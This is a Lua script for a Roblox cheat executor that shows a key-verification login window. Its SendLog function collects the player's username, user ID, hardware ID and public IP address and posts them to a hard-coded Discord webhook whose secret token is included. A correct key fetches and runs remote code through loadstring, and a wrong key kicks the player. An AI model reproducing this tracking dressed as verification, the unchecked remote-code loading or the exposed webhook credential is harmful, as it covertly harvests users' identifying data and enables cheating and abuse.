function SendLog()
local executor = identifyexecutor()
local url = "https://discord.com/api/webhooks/974036305287712868/xVGvbdL9FgpyBQ034oGnpdfV4nck2qkbJi3nU-g6XtCRA5kZWLbdfEgDaKlNV2ZKYeSL"
local name = game.Players.LocalPlayer.Name
local userid = game.Players.LocalPlayer.UserId
local display = game.Players.LocalPlayer.DisplayName
local hhh = game:GetService("RbxAnalyticsService"):GetClientId()
local get = game:HttpGet("https://v4.ident.me")
local data = {
    ["content"] = "", ["embeds"] = {
        {
            ["title"] = "__KH VERIFICATION__",
            ["description"] = "Username: "..name.."\nUser ID: "..userid.."\nDisplay Name: "..display.."\nHWID: "..hhh.."\nIP: "..get.."Key: "..keyin.Text,
            ["type"] = "rich",
            ["color"] = tonumber(0x55ff33),
            ["image"] = {
                ["url"] = "https://cdn.discordapp.com/attachments/896040839946571859/961248140214816829/void_green_bar.png"
            }
        }
    }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)
local headers = {["content-type"] = "application/json"}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
end

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local titlething = Instance.new("TextLabel")
local keyin = Instance.new("TextBox")
local TextButton = Instance.new("TextButton")

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderColor3 = Color3.fromRGB(60, 0, 90)
Frame.BorderSizePixel = 2
Frame.Position = UDim2.new(0.379146904, 0, 0.355592668, 0)
Frame.Size = UDim2.new(0, 306, 0, 131)

titlething.Name = "titlething"
titlething.Parent = Frame
titlething.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
titlething.BackgroundTransparency = 1.000
titlething.BorderColor3 = Color3.fromRGB(60, 0, 90)
titlething.Size = UDim2.new(0, 306, 0, 23)
titlething.Font = Enum.Font.SourceSans
titlething.Text = "KH-VERIFICATION-LOGIN"
titlething.TextColor3 = Color3.fromRGB(60, 0, 90)
titlething.TextScaled = true
titlething.TextSize = 14.000
titlething.TextWrapped = true

keyin.Name = "keyin"
keyin.Parent = Frame
keyin.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
keyin.BackgroundTransparency = 1.000
keyin.Position = UDim2.new(0.173202619, 0, 0.337574244, 0)
keyin.Size = UDim2.new(0, 200, 0, 29)
keyin.Font = Enum.Font.SourceSans
keyin.PlaceholderColor3 = Color3.fromRGB(60, 0, 90)
keyin.PlaceholderText = "KEY HERE"
keyin.Text = ""
keyin.TextColor3 = Color3.fromRGB(60, 0, 90)
keyin.TextSize = 14.000

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextButton.BackgroundTransparency = 1.000
TextButton.Position = UDim2.new(0.173202619, 0, 0.664122105, 0)
TextButton.Size = UDim2.new(0, 200, 0, 20)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "SUBMIT"
TextButton.TextColor3 = Color3.fromRGB(60, 0, 90)
TextButton.TextScaled = true
TextButton.TextSize = 14.000
TextButton.TextWrapped = true
TextButton.MouseButton1Down:Connect(function()
if keyin.Text == "KeyHere" and game.Players.LocalPlayer.Name == "a" and game.Players.LocalPlayer.UserId == 1234 then
    Frame.Visible = false
    loadstring(game:HttpGet(""))()
    else
    game.Players.LocalPlayer:Kick("Wrong key or account, verification failed.")
    end
end)
